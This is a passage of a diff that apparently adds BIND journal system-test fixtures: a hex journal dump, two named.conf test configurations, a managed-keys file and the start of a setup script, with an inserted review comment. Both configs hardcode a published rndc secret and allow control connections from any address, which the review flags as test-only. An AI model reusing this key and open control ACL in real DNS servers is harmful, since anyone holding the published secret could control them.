+978272e1e3e079c5094d573f0e83c92f +02b32d3513b1550b826929c80dd0f92c +ac966d17769fd5867b647c3f38029abd +c48152eb8f207159ecc5d232c7c1537c +79f4b7ac28ff11682f21681bf6d6aba5 +55032bf6f9f036beb2aaa5b3778d6eeb +fba6bf9ea191be4ab0caea759e2f773a +1f9029c73ecb8d5735b9321db085f1b8 +e2d8038fe2941992548cee0d67dd4547 +e11dd63af9c9fc1c5466fb684cf009d7 +197c2cf79e792ab501e6a8a1ca519af2 +cb9b5f6367e94c0d47502451357be1b5 
+00000021000006000100000000001600 +0000000cd50000000000000000000000 +00000000000000011f00fffd00010000 +00000114605a283e598e0a8300000000 +0101030803010001acffb409bcc939f8 +31f7a1e5ec88f7a59255ec53040be432 +027390a4ce896d6f9086f3c5e177fbfe +118163aaec7af1462c47945944c4e2c0 +26be5e98bbcded25978272e1e3e079c5 +094d573f0e83c92f02b32d3513b1550b +826929c80dd0f92cac966d17769fd586 +7b647c3f38029abdc48152eb8f207159 +ecc5d232c7c1537c79f4b7ac28ff1168 +2f21681bf6d6aba555032bf6f9f036be +b2aaa5b3778d6eebfba6bf9ea191be4a +b0caea759e2f773a1f9029c73ecb8d57 +35b9321db085f1b8e2d8038fe2941992 +548cee0d67dd4547e11dd63af9c9fc1c +5466fb684cf009d7197c2cf79e792ab5 +01e6a8a1ca519af2cb9b5f6367e94c0d +47502451357be1b50000029000000cd5 +00000cd6000000000000002100000600 +01000000000016000000000cd5000000 +00000000000000000000000000000001 +1f00fffd0001000000000114605a283e +598e0a83000000000101030803010001 +acffb409bcc939f831f7a1e5ec88f7a5 +9255ec53040be432027390a4ce896d6f +9086f3c5e177fbfe118163aaec7af146 +2c47945944c4e2c026be5e98bbcded25 +978272e1e3e079c5094d573f0e83c92f +02b32d3513b1550b826929c80dd0f92c +ac966d17769fd5867b647c3f38029abd +c48152eb8f207159ecc5d232c7c1537c +79f4b7ac28ff11682f21681bf6d6aba5 +55032bf6f9f036beb2aaa5b3778d6eeb +fba6bf9ea191be4ab0caea759e2f773a +1f9029c73ecb8d5735b9321db085f1b8 +e2d8038fe2941992548cee0d67dd4547 +e11dd63af9c9fc1c5466fb684cf009d7 +197c2cf79e792ab501e6a8a1ca519af2 +cb9b5f6367e94c0d47502451357be1b5 +00000021000006000100000000001600 +0000000cd60000000000000000000000 +00000000000000011f00fffd00010000 +00000114605b47c2598e0a8300000000 +0101030803010001acffb409bcc939f8 +31f7a1e5ec88f7a59255ec53040be432 +027390a4ce896d6f9086f3c5e177fbfe +118163aaec7af1462c47945944c4e2c0 +26be5e98bbcded25978272e1e3e079c5 +094d573f0e83c92f02b32d3513b1550b +826929c80dd0f92cac966d17769fd586 +7b647c3f38029abdc48152eb8f207159 +ecc5d232c7c1537c79f4b7ac28ff1168 +2f21681bf6d6aba555032bf6f9f036be +b2aaa5b3778d6eebfba6bf9ea191be4a +b0caea759e2f773a1f9029c73ecb8d57 
+35b9321db085f1b8e2d8038fe2941992 +548cee0d67dd4547e11dd63af9c9fc1c +5466fb684cf009d7197c2cf79e792ab5 +01e6a8a1ca519af2cb9b5f6367e94c0d +47502451357be1b50000029000000cd6 +00000cd7000000000000002100000600 +01000000000016000000000cd6000000 +00000000000000000000000000000001 +1f00fffd0001000000000114605b47c2 +598e0a83000000000101030803010001 +acffb409bcc939f831f7a1e5ec88f7a5 +9255ec53040be432027390a4ce896d6f +9086f3c5e177fbfe118163aaec7af146 +2c47945944c4e2c026be5e98bbcded25 +978272e1e3e079c5094d573f0e83c92f +02b32d3513b1550b826929c80dd0f92c +ac966d17769fd5867b647c3f38029abd +c48152eb8f207159ecc5d232c7c1537c +79f4b7ac28ff11682f21681bf6d6aba5 +55032bf6f9f036beb2aaa5b3778d6eeb +fba6bf9ea191be4ab0caea759e2f773a +1f9029c73ecb8d5735b9321db085f1b8 +e2d8038fe2941992548cee0d67dd4547 +e11dd63af9c9fc1c5466fb684cf009d7 +197c2cf79e792ab501e6a8a1ca519af2 +cb9b5f6367e94c0d47502451357be1b5 +00000021000006000100000000001600 +0000000cd70000000000000000000000 +00000000000000011f00fffd00010000 +00000114605b79bf598e0a8300000000 +0101030803010001acffb409bcc939f8 +31f7a1e5ec88f7a59255ec53040be432 +027390a4ce896d6f9086f3c5e177fbfe +118163aaec7af1462c47945944c4e2c0 +26be5e98bbcded25978272e1e3e079c5 +094d573f0e83c92f02b32d3513b1550b +826929c80dd0f92cac966d17769fd586 +7b647c3f38029abdc48152eb8f207159 +ecc5d232c7c1537c79f4b7ac28ff1168 +2f21681bf6d6aba555032bf6f9f036be +b2aaa5b3778d6eebfba6bf9ea191be4a +b0caea759e2f773a1f9029c73ecb8d57 +35b9321db085f1b8e2d8038fe2941992 +548cee0d67dd4547e11dd63af9c9fc1c +5466fb684cf009d7197c2cf79e792ab5 +01e6a8a1ca519af2cb9b5f6367e94c0d +47502451357be1b50000029000000cd7 +00000cd8000000000000002100000600 +01000000000016000000000cd7000000 +00000000000000000000000000000001 +1f00fffd0001000000000114605b79bf +598e0a83000000000101030803010001 +acffb409bcc939f831f7a1e5ec88f7a5 +9255ec53040be432027390a4ce896d6f +9086f3c5e177fbfe118163aaec7af146 +2c47945944c4e2c026be5e98bbcded25 +978272e1e3e079c5094d573f0e83c92f +02b32d3513b1550b826929c80dd0f92c 
+ac966d17769fd5867b647c3f38029abd +c48152eb8f207159ecc5d232c7c1537c +79f4b7ac28ff11682f21681bf6d6aba5 +55032bf6f9f036beb2aaa5b3778d6eeb +fba6bf9ea191be4ab0caea759e2f773a +1f9029c73ecb8d5735b9321db085f1b8 +e2d8038fe2941992548cee0d67dd4547 +e11dd63af9c9fc1c5466fb684cf009d7 +197c2cf79e792ab501e6a8a1ca519af2 +cb9b5f6367e94c0d47502451357be1b5 +00000021000006000100000000001600 +0000000cd80000000000000000000000 +00000000000000011f00fffd00010000 +00000114605c9943598e0a8300000000 +0101030803010001acffb409bcc939f8 +31f7a1e5ec88f7a59255ec53040be432 +027390a4ce896d6f9086f3c5e177fbfe +118163aaec7af1462c47945944c4e2c0 +26be5e98bbcded25978272e1e3e079c5 +094d573f0e83c92f02b32d3513b1550b +826929c80dd0f92cac966d17769fd586 +7b647c3f38029abdc48152eb8f207159 +ecc5d232c7c1537c79f4b7ac28ff1168 +2f21681bf6d6aba555032bf6f9f036be +b2aaa5b3778d6eebfba6bf9ea191be4a +b0caea759e2f773a1f9029c73ecb8d57 +35b9321db085f1b8e2d8038fe2941992 +548cee0d67dd4547e11dd63af9c9fc1c +5466fb684cf009d7197c2cf79e792ab5 +01e6a8a1ca519af2cb9b5f6367e94c0d +47502451357be1b50000029000000cd8 +00000cd9000000000000002100000600 +01000000000016000000000cd8000000 +00000000000000000000000000000001 +1f00fffd0001000000000114605c9943 +598e0a83000000000101030803010001 +acffb409bcc939f831f7a1e5ec88f7a5 +9255ec53040be432027390a4ce896d6f +9086f3c5e177fbfe118163aaec7af146 +2c47945944c4e2c026be5e98bbcded25 +978272e1e3e079c5094d573f0e83c92f +02b32d3513b1550b826929c80dd0f92c +ac966d17769fd5867b647c3f38029abd +c48152eb8f207159ecc5d232c7c1537c +79f4b7ac28ff11682f21681bf6d6aba5 +55032bf6f9f036beb2aaa5b3778d6eeb +fba6bf9ea191be4ab0caea759e2f773a +1f9029c73ecb8d5735b9321db085f1b8 +e2d8038fe2941992548cee0d67dd4547 +e11dd63af9c9fc1c5466fb684cf009d7 +197c2cf79e792ab501e6a8a1ca519af2 +cb9b5f6367e94c0d47502451357be1b5 +00000021000006000100000000001600 +0000000cd90000000000000000000000 +00000000000000011f00fffd00010000 +00000114605ccb40598e0a8300000000 +0101030803010001acffb409bcc939f8 +31f7a1e5ec88f7a59255ec53040be432 
+027390a4ce896d6f9086f3c5e177fbfe +118163aaec7af1462c47945944c4e2c0 +26be5e98bbcded25978272e1e3e079c5 +094d573f0e83c92f02b32d3513b1550b +826929c80dd0f92cac966d17769fd586 +7b647c3f38029abdc48152eb8f207159 +ecc5d232c7c1537c79f4b7ac28ff1168 +2f21681bf6d6aba555032bf6f9f036be +b2aaa5b3778d6eebfba6bf9ea191be4a +b0caea759e2f773a1f9029c73ecb8d57 +35b9321db085f1b8e2d8038fe2941992 +548cee0d67dd4547e11dd63af9c9fc1c +5466fb684cf009d7197c2cf79e792ab5 +01e6a8a1ca519af2cb9b5f6367e94c0d +47502451357be1b50000029000000cd9 +00000cda000000000000002100000600 +01000000000016000000000cd9000000 +00000000000000000000000000000001 +1f00fffd0001000000000114605ccb40 +598e0a83000000000101030803010001 +acffb409bcc939f831f7a1e5ec88f7a5 +9255ec53040be432027390a4ce896d6f +9086f3c5e177fbfe118163aaec7af146 +2c47945944c4e2c026be5e98bbcded25 +978272e1e3e079c5094d573f0e83c92f +02b32d3513b1550b826929c80dd0f92c +ac966d17769fd5867b647c3f38029abd +c48152eb8f207159ecc5d232c7c1537c +79f4b7ac28ff11682f21681bf6d6aba5 +55032bf6f9f036beb2aaa5b3778d6eeb +fba6bf9ea191be4ab0caea759e2f773a +1f9029c73ecb8d5735b9321db085f1b8 +e2d8038fe2941992548cee0d67dd4547 +e11dd63af9c9fc1c5466fb684cf009d7 +197c2cf79e792ab501e6a8a1ca519af2 +cb9b5f6367e94c0d47502451357be1b5 +00000021000006000100000000001600 +0000000cda0000000000000000000000 +00000000000000011f00fffd00010000 +00000114605deac4598e0a8300000000 +0101030803010001acffb409bcc939f8 +31f7a1e5ec88f7a59255ec53040be432 +027390a4ce896d6f9086f3c5e177fbfe +118163aaec7af1462c47945944c4e2c0 +26be5e98bbcded25978272e1e3e079c5 +094d573f0e83c92f02b32d3513b1550b +826929c80dd0f92cac966d17769fd586 +7b647c3f38029abdc48152eb8f207159 +ecc5d232c7c1537c79f4b7ac28ff1168 +2f21681bf6d6aba555032bf6f9f036be +b2aaa5b3778d6eebfba6bf9ea191be4a +b0caea759e2f773a1f9029c73ecb8d57 +35b9321db085f1b8e2d8038fe2941992 +548cee0d67dd4547e11dd63af9c9fc1c +5466fb684cf009d7197c2cf79e792ab5 +01e6a8a1ca519af2cb9b5f6367e94c0d +47502451357be1b50000029000000cda +00000cdb000000000000002100000600 
+01000000000016000000000cda000000 +00000000000000000000000000000001 +1f00fffd0001000000000114605deac4 +598e0a83000000000101030803010001 +acffb409bcc939f831f7a1e5ec88f7a5 +9255ec53040be432027390a4ce896d6f +9086f3c5e177fbfe118163aaec7af146 +2c47945944c4e2c026be5e98bbcded25 +978272e1e3e079c5094d573f0e83c92f +02b32d3513b1550b826929c80dd0f92c +ac966d17769fd5867b647c3f38029abd +c48152eb8f207159ecc5d232c7c1537c +79f4b7ac28ff11682f21681bf6d6aba5 +55032bf6f9f036beb2aaa5b3778d6eeb +fba6bf9ea191be4ab0caea759e2f773a +1f9029c73ecb8d5735b9321db085f1b8 +e2d8038fe2941992548cee0d67dd4547 +e11dd63af9c9fc1c5466fb684cf009d7 +197c2cf79e792ab501e6a8a1ca519af2 +cb9b5f6367e94c0d47502451357be1b5 +00000021000006000100000000001600 +0000000cdb0000000000000000000000 +00000000000000011f00fffd00010000 +00000114605e1cc0598e0a8300000000 +0101030803010001acffb409bcc939f8 +31f7a1e5ec88f7a59255ec53040be432 +027390a4ce896d6f9086f3c5e177fbfe +118163aaec7af1462c47945944c4e2c0 +26be5e98bbcded25978272e1e3e079c5 +094d573f0e83c92f02b32d3513b1550b +826929c80dd0f92cac966d17769fd586 +7b647c3f38029abdc48152eb8f207159 +ecc5d232c7c1537c79f4b7ac28ff1168 +2f21681bf6d6aba555032bf6f9f036be +b2aaa5b3778d6eebfba6bf9ea191be4a +b0caea759e2f773a1f9029c73ecb8d57 +35b9321db085f1b8e2d8038fe2941992 +548cee0d67dd4547e11dd63af9c9fc1c +5466fb684cf009d7197c2cf79e792ab5 +01e6a8a1ca519af2cb9b5f6367e94c0d +47502451357be1b50000029000000cdb +00000cdc000000000000002100000600 +01000000000016000000000cdb000000 +00000000000000000000000000000001 +1f00fffd0001000000000114605e1cc0 +598e0a83000000000101030803010001 +acffb409bcc939f831f7a1e5ec88f7a5 +9255ec53040be432027390a4ce896d6f +9086f3c5e177fbfe118163aaec7af146 +2c47945944c4e2c026be5e98bbcded25 +978272e1e3e079c5094d573f0e83c92f +02b32d3513b1550b826929c80dd0f92c +ac966d17769fd5867b647c3f38029abd +c48152eb8f207159ecc5d232c7c1537c +79f4b7ac28ff11682f21681bf6d6aba5 +55032bf6f9f036beb2aaa5b3778d6eeb +fba6bf9ea191be4ab0caea759e2f773a +1f9029c73ecb8d5735b9321db085f1b8 
+e2d8038fe2941992548cee0d67dd4547 +e11dd63af9c9fc1c5466fb684cf009d7 +197c2cf79e792ab501e6a8a1ca519af2 +cb9b5f6367e94c0d47502451357be1b5 +00000021000006000100000000001600 +0000000cdc0000000000000000000000 +00000000000000011f00fffd00010000 +00000114605efb3a598e0a8300000000 +0101030803010001acffb409bcc939f8 +31f7a1e5ec88f7a59255ec53040be432 +027390a4ce896d6f9086f3c5e177fbfe +118163aaec7af1462c47945944c4e2c0 +26be5e98bbcded25978272e1e3e079c5 +094d573f0e83c92f02b32d3513b1550b +826929c80dd0f92cac966d17769fd586 +7b647c3f38029abdc48152eb8f207159 +ecc5d232c7c1537c79f4b7ac28ff1168 +2f21681bf6d6aba555032bf6f9f036be +b2aaa5b3778d6eebfba6bf9ea191be4a +b0caea759e2f773a1f9029c73ecb8d57 +35b9321db085f1b8e2d8038fe2941992 +548cee0d67dd4547e11dd63af9c9fc1c +5466fb684cf009d7197c2cf79e792ab5 +01e6a8a1ca519af2cb9b5f6367e94c0d +47502451357be1b50000029000000cdc +00000cdd000000000000002100000600 +01000000000016000000000cdc000000 +00000000000000000000000000000001 +1f00fffd0001000000000114605efb3a +598e0a83000000000101030803010001 +acffb409bcc939f831f7a1e5ec88f7a5 +9255ec53040be432027390a4ce896d6f +9086f3c5e177fbfe118163aaec7af146 +2c47945944c4e2c026be5e98bbcded25 +978272e1e3e079c5094d573f0e83c92f +02b32d3513b1550b826929c80dd0f92c +ac966d17769fd5867b647c3f38029abd +c48152eb8f207159ecc5d232c7c1537c +79f4b7ac28ff11682f21681bf6d6aba5 +55032bf6f9f036beb2aaa5b3778d6eeb +fba6bf9ea191be4ab0caea759e2f773a +1f9029c73ecb8d5735b9321db085f1b8 +e2d8038fe2941992548cee0d67dd4547 +e11dd63af9c9fc1c5466fb684cf009d7 +197c2cf79e792ab501e6a8a1ca519af2 +cb9b5f6367e94c0d47502451357be1b5 +00000021000006000100000000001600 +0000000cdd0000000000000000000000 +00000000000000011f00fffd00010000 +00000114605f6e40598e0a8300000000 +0101030803010001acffb409bcc939f8 +31f7a1e5ec88f7a59255ec53040be432 +027390a4ce896d6f9086f3c5e177fbfe +118163aaec7af1462c47945944c4e2c0 +26be5e98bbcded25978272e1e3e079c5 +094d573f0e83c92f02b32d3513b1550b +826929c80dd0f92cac966d17769fd586 +7b647c3f38029abdc48152eb8f207159 
+ecc5d232c7c1537c79f4b7ac28ff1168 +2f21681bf6d6aba555032bf6f9f036be +b2aaa5b3778d6eebfba6bf9ea191be4a +b0caea759e2f773a1f9029c73ecb8d57 +35b9321db085f1b8e2d8038fe2941992 +548cee0d67dd4547e11dd63af9c9fc1c +5466fb684cf009d7197c2cf79e792ab5 +01e6a8a1ca519af2cb9b5f6367e94c0d +47502451357be1b50000029000000cdd +00000cde000000000000002100000600 +01000000000016000000000cdd000000 +00000000000000000000000000000001 +1f00fffd0001000000000114605f6e40 +598e0a83000000000101030803010001 +acffb409bcc939f831f7a1e5ec88f7a5 +9255ec53040be432027390a4ce896d6f +9086f3c5e177fbfe118163aaec7af146 +2c47945944c4e2c026be5e98bbcded25 +978272e1e3e079c5094d573f0e83c92f +02b32d3513b1550b826929c80dd0f92c +ac966d17769fd5867b647c3f38029abd +c48152eb8f207159ecc5d232c7c1537c +79f4b7ac28ff11682f21681bf6d6aba5 +55032bf6f9f036beb2aaa5b3778d6eeb +fba6bf9ea191be4ab0caea759e2f773a +1f9029c73ecb8d5735b9321db085f1b8 +e2d8038fe2941992548cee0d67dd4547 +e11dd63af9c9fc1c5466fb684cf009d7 +197c2cf79e792ab501e6a8a1ca519af2 +cb9b5f6367e94c0d47502451357be1b5 +00000021000006000100000000001600 +0000000cde0000000000000000000000 +00000000000000011f00fffd00010000 +0000011460604cbb598e0a8300000000 +0101030803010001acffb409bcc939f8 +31f7a1e5ec88f7a59255ec53040be432 +027390a4ce896d6f9086f3c5e177fbfe +118163aaec7af1462c47945944c4e2c0 +26be5e98bbcded25978272e1e3e079c5 +094d573f0e83c92f02b32d3513b1550b +826929c80dd0f92cac966d17769fd586 +7b647c3f38029abdc48152eb8f207159 +ecc5d232c7c1537c79f4b7ac28ff1168 +2f21681bf6d6aba555032bf6f9f036be +b2aaa5b3778d6eebfba6bf9ea191be4a +b0caea759e2f773a1f9029c73ecb8d57 +35b9321db085f1b8e2d8038fe2941992 +548cee0d67dd4547e11dd63af9c9fc1c +5466fb684cf009d7197c2cf79e792ab5 +01e6a8a1ca519af2cb9b5f6367e94c0d +47502451357be1b50000029000000cde +00000cdf000000000000002100000600 +01000000000016000000000cde000000 +00000000000000000000000000000001 +1f00fffd000100000000011460604cbb +598e0a83000000000101030803010001 +acffb409bcc939f831f7a1e5ec88f7a5 +9255ec53040be432027390a4ce896d6f 
+9086f3c5e177fbfe118163aaec7af146 +2c47945944c4e2c026be5e98bbcded25 +978272e1e3e079c5094d573f0e83c92f +02b32d3513b1550b826929c80dd0f92c +ac966d17769fd5867b647c3f38029abd +c48152eb8f207159ecc5d232c7c1537c +79f4b7ac28ff11682f21681bf6d6aba5 +55032bf6f9f036beb2aaa5b3778d6eeb +fba6bf9ea191be4ab0caea759e2f773a +1f9029c73ecb8d5735b9321db085f1b8 +e2d8038fe2941992548cee0d67dd4547 +e11dd63af9c9fc1c5466fb684cf009d7 +197c2cf79e792ab501e6a8a1ca519af2 +cb9b5f6367e94c0d47502451357be1b5 +00000021000006000100000000001600 +0000000cdf0000000000000000000000 +00000000000000011f00fffd00010000 +000001146060bfc0598e0a8300000000 +0101030803010001acffb409bcc939f8 +31f7a1e5ec88f7a59255ec53040be432 +027390a4ce896d6f9086f3c5e177fbfe +118163aaec7af1462c47945944c4e2c0 +26be5e98bbcded25978272e1e3e079c5 +094d573f0e83c92f02b32d3513b1550b +826929c80dd0f92cac966d17769fd586 +7b647c3f38029abdc48152eb8f207159 +ecc5d232c7c1537c79f4b7ac28ff1168 +2f21681bf6d6aba555032bf6f9f036be +b2aaa5b3778d6eebfba6bf9ea191be4a +b0caea759e2f773a1f9029c73ecb8d57 +35b9321db085f1b8e2d8038fe2941992 +548cee0d67dd4547e11dd63af9c9fc1c +5466fb684cf009d7197c2cf79e792ab5 +01e6a8a1ca519af2cb9b5f6367e94c0d +47502451357be1b50000029000000cdf +00000ce0000000000000002100000600 +01000000000016000000000cdf000000 +00000000000000000000000000000001 +1f00fffd00010000000001146060bfc0 +598e0a83000000000101030803010001 +acffb409bcc939f831f7a1e5ec88f7a5 +9255ec53040be432027390a4ce896d6f +9086f3c5e177fbfe118163aaec7af146 +2c47945944c4e2c026be5e98bbcded25 +978272e1e3e079c5094d573f0e83c92f +02b32d3513b1550b826929c80dd0f92c +ac966d17769fd5867b647c3f38029abd +c48152eb8f207159ecc5d232c7c1537c +79f4b7ac28ff11682f21681bf6d6aba5 +55032bf6f9f036beb2aaa5b3778d6eeb +fba6bf9ea191be4ab0caea759e2f773a +1f9029c73ecb8d5735b9321db085f1b8 +e2d8038fe2941992548cee0d67dd4547 +e11dd63af9c9fc1c5466fb684cf009d7 +197c2cf79e792ab501e6a8a1ca519af2 +cb9b5f6367e94c0d47502451357be1b5 +00000021000006000100000000001600 +0000000ce00000000000000000000000 
+00000000000000011f00fffd00010000 +0000011460619e3b598e0a8300000000 +0101030803010001acffb409bcc939f8 +31f7a1e5ec88f7a59255ec53040be432 +027390a4ce896d6f9086f3c5e177fbfe +118163aaec7af1462c47945944c4e2c0 +26be5e98bbcded25978272e1e3e079c5 +094d573f0e83c92f02b32d3513b1550b +826929c80dd0f92cac966d17769fd586 +7b647c3f38029abdc48152eb8f207159 +ecc5d232c7c1537c79f4b7ac28ff1168 +2f21681bf6d6aba555032bf6f9f036be +b2aaa5b3778d6eebfba6bf9ea191be4a +b0caea759e2f773a1f9029c73ecb8d57 +35b9321db085f1b8e2d8038fe2941992 +548cee0d67dd4547e11dd63af9c9fc1c +5466fb684cf009d7197c2cf79e792ab5 +01e6a8a1ca519af2cb9b5f6367e94c0d +47502451357be1b50000029000000ce0 +00000ce1000000000000002100000600 +01000000000016000000000ce0000000 +00000000000000000000000000000001 +1f00fffd000100000000011460619e3b +598e0a83000000000101030803010001 +acffb409bcc939f831f7a1e5ec88f7a5 +9255ec53040be432027390a4ce896d6f +9086f3c5e177fbfe118163aaec7af146 +2c47945944c4e2c026be5e98bbcded25 +978272e1e3e079c5094d573f0e83c92f +02b32d3513b1550b826929c80dd0f92c +ac966d17769fd5867b647c3f38029abd +c48152eb8f207159ecc5d232c7c1537c +79f4b7ac28ff11682f21681bf6d6aba5 +55032bf6f9f036beb2aaa5b3778d6eeb +fba6bf9ea191be4ab0caea759e2f773a +1f9029c73ecb8d5735b9321db085f1b8 +e2d8038fe2941992548cee0d67dd4547 +e11dd63af9c9fc1c5466fb684cf009d7 +197c2cf79e792ab501e6a8a1ca519af2 +cb9b5f6367e94c0d47502451357be1b5 +00000021000006000100000000001600 +0000000ce10000000000000000000000 +00000000000000011f00fffd00010000 +0000011460621140598e0a8300000000 +0101030803010001acffb409bcc939f8 +31f7a1e5ec88f7a59255ec53040be432 +027390a4ce896d6f9086f3c5e177fbfe +118163aaec7af1462c47945944c4e2c0 +26be5e98bbcded25978272e1e3e079c5 +094d573f0e83c92f02b32d3513b1550b +826929c80dd0f92cac966d17769fd586 +7b647c3f38029abdc48152eb8f207159 +ecc5d232c7c1537c79f4b7ac28ff1168 +2f21681bf6d6aba555032bf6f9f036be +b2aaa5b3778d6eebfba6bf9ea191be4a +b0caea759e2f773a1f9029c73ecb8d57 +35b9321db085f1b8e2d8038fe2941992 +548cee0d67dd4547e11dd63af9c9fc1c 
+5466fb684cf009d7197c2cf79e792ab5 +01e6a8a1ca519af2cb9b5f6367e94c0d +47502451357be1b50000029000000ce1 +00000ce2000000000000002100000600 +01000000000016000000000ce1000000 +00000000000000000000000000000001 +1f00fffd000100000000011460621140 +598e0a83000000000101030803010001 +acffb409bcc939f831f7a1e5ec88f7a5 +9255ec53040be432027390a4ce896d6f +9086f3c5e177fbfe118163aaec7af146 +2c47945944c4e2c026be5e98bbcded25 +978272e1e3e079c5094d573f0e83c92f +02b32d3513b1550b826929c80dd0f92c +ac966d17769fd5867b647c3f38029abd +c48152eb8f207159ecc5d232c7c1537c +79f4b7ac28ff11682f21681bf6d6aba5 +55032bf6f9f036beb2aaa5b3778d6eeb +fba6bf9ea191be4ab0caea759e2f773a +1f9029c73ecb8d5735b9321db085f1b8 +e2d8038fe2941992548cee0d67dd4547 +e11dd63af9c9fc1c5466fb684cf009d7 +197c2cf79e792ab501e6a8a1ca519af2 +cb9b5f6367e94c0d47502451357be1b5 +00000021000006000100000000001600 +0000000ce20000000000000000000000 +00000000000000011f00fffd00010000 +000001146062efbb598e0a8300000000 +0101030803010001acffb409bcc939f8 +31f7a1e5ec88f7a59255ec53040be432 +027390a4ce896d6f9086f3c5e177fbfe +118163aaec7af1462c47945944c4e2c0 +26be5e98bbcded25978272e1e3e079c5 +094d573f0e83c92f02b32d3513b1550b +826929c80dd0f92cac966d17769fd586 +7b647c3f38029abdc48152eb8f207159 +ecc5d232c7c1537c79f4b7ac28ff1168 +2f21681bf6d6aba555032bf6f9f036be +b2aaa5b3778d6eebfba6bf9ea191be4a +b0caea759e2f773a1f9029c73ecb8d57 +35b9321db085f1b8e2d8038fe2941992 +548cee0d67dd4547e11dd63af9c9fc1c +5466fb684cf009d7197c2cf79e792ab5 +01e6a8a1ca519af2cb9b5f6367e94c0d +47502451357be1b5 diff --git a/bin/tests/system/journal/ns1/maxjournal.jnl.saved b/bin/tests/system/journal/ns1/maxjournal.jnl.saved Binary files differnew file mode 100644 index 0000000..7c79e5c --- /dev/null +++ b/bin/tests/system/journal/ns1/maxjournal.jnl.saved diff --git a/bin/tests/system/journal/ns1/maxjournal2.jnl.saved b/bin/tests/system/journal/ns1/maxjournal2.jnl.saved Binary files differnew file mode 100644 index 0000000..e200905 --- /dev/null 
+++ b/bin/tests/system/journal/ns1/maxjournal2.jnl.saved diff --git a/bin/tests/system/journal/ns1/named.conf.in b/bin/tests/system/journal/ns1/named.conf.in new file mode 100644 index 0000000..1f6e983 --- /dev/null +++ b/bin/tests/system/journal/ns1/named.conf.in 
@@ -0,0 +1,92 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +options { + query-source address 10.53.0.1; + notify-source 10.53.0.1; + transfer-source 10.53.0.1; + port @PORT@; + session-keyfile "session.key"; + pid-file "named.pid"; + listen-on { 10.53.0.1; }; + listen-on-v6 { none; }; + dnssec-validation yes; + minimal-responses no; + recursion no; + notify yes; +}; + +key rndc_key { + secret "1234abcd8765"; + algorithm hmac-sha256; +}; + +controls { + inet 10.53.0.1 port @CONTROLPORT@ allow { any; } keys { rndc_key; }; +}; + +zone changed { + type primary; + update-policy local; + file "changed.db"; +}; + +zone unchanged { + type primary; + update-policy local; + file "unchanged.db"; +}; + +zone changed2 { + type primary; + update-policy local; + file "changed2.db"; +}; + +zone unchanged2 { + type primary; + update-policy local; + file "unchanged2.db"; +}; + +zone hdr1d1d2d1d2 { + type primary; + update-policy local; + file "d1212.db"; +}; + +zone hdr1d2d1d2d1 { + type primary; + update-policy local; + file "d2121.db"; +}; + +zone ixfr { + type primary; + ixfr-from-differences yes; + file "ixfr.db"; +}; + +zone maxjournal { + type primary; + max-journal-size 1k; + update-policy local; + file "maxjournal.db"; +}; + +zone maxjournal2 { + type primary; + max-journal-size 1k; + update-policy local; + file "maxjournal2.db"; +}; diff --git a/bin/tests/system/journal/ns1/unchanged.ver1.jnl.saved b/bin/tests/system/journal/ns1/unchanged.ver1.jnl.saved Binary files differnew file mode 100644 index 0000000..f7885d9 --- /dev/null 
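Review bot: The `controls` statement pairs `allow { any; }` with the fixed secret `1234abcd8765` in `key rndc_key`, so any client that can reach 10.53.0.1 on the control port and has read this source tree can drive rndc on the instance. That is fine only while 10.53.0.1 is a host-local test address, which is presumably what the harness sets up but is not visible in this hunk. I would put a comment above the key block, `/* Test-only rndc key, published in the source tree; never reuse it in a deployed configuration. */`. Narrowing the ACL to the test network is worth considering if rndc's source address in the harness is known. The same `key`/`controls` pair appears in ns2/named.conf.in later in this commit.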
+++ b/bin/tests/system/journal/ns1/unchanged.ver1.jnl.saved diff --git a/bin/tests/system/journal/ns1/unchanged.ver2.jnl.saved b/bin/tests/system/journal/ns1/unchanged.ver2.jnl.saved Binary files differnew file mode 100644 index 0000000..d974be4 --- /dev/null +++ b/bin/tests/system/journal/ns1/unchanged.ver2.jnl.saved diff --git a/bin/tests/system/journal/ns2/managed-keys.bind.in b/bin/tests/system/journal/ns2/managed-keys.bind.in new file mode 100644 index 0000000..2139706 --- /dev/null +++ b/bin/tests/system/journal/ns2/managed-keys.bind.in @@ -0,0 +1,14 @@ +$ORIGIN . +$TTL 0 ; 0 seconds +@ IN SOA . . ( + 29 ; serial + 0 ; refresh (0 seconds) + 0 ; retry (0 seconds) + 0 ; expire (0 seconds) + 0 ; minimum (0 seconds) + ) + KEYDATA 20210611104535 19700101000000 19700101000000 0 0 0 ( + + ) ; ZSK; alg = 0; key id = 0 + ; next refresh: Fri, 11 Jun 2021 10:45:35 GMT + ; no trust diff --git a/bin/tests/system/journal/ns2/managed-keys.bind.jnl.in b/bin/tests/system/journal/ns2/managed-keys.bind.jnl.in Binary files differnew file mode 100644 index 0000000..01c1d47 --- /dev/null +++ b/bin/tests/system/journal/ns2/managed-keys.bind.jnl.in diff --git a/bin/tests/system/journal/ns2/named.conf.in b/bin/tests/system/journal/ns2/named.conf.in new file mode 100644 index 0000000..4c07c92 --- /dev/null +++ b/bin/tests/system/journal/ns2/named.conf.in 
@@ -0,0 +1,36 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+options {
+ query-source address 10.53.0.2;
+ notify-source 10.53.0.2;
+ transfer-source 10.53.0.2;
+ port @PORT@;
+ session-keyfile "session.key";
+ pid-file "named.pid";
+ listen-on { 10.53.0.2; };
+ listen-on-v6 { none; };
+ dnssec-validation yes;
+ minimal-responses no;
+ recursion no;
+ notify yes;
+};
+
+key rndc_key {
+ secret "1234abcd8765";
+ algorithm hmac-sha256;
+};
+
+controls {
+ inet 10.53.0.2 port @CONTROLPORT@ allow { any; } keys { rndc_key; };
+};
diff --git a/bin/tests/system/journal/setup.sh b/bin/tests/system/journal/setup.sh
new file mode 100644
index 0000000..e9b0072
--- /dev/null
+++ b/bin/tests/system/journal/setup.sh
@@ -0,0 +1,51 @@
+#!/bin/sh
+
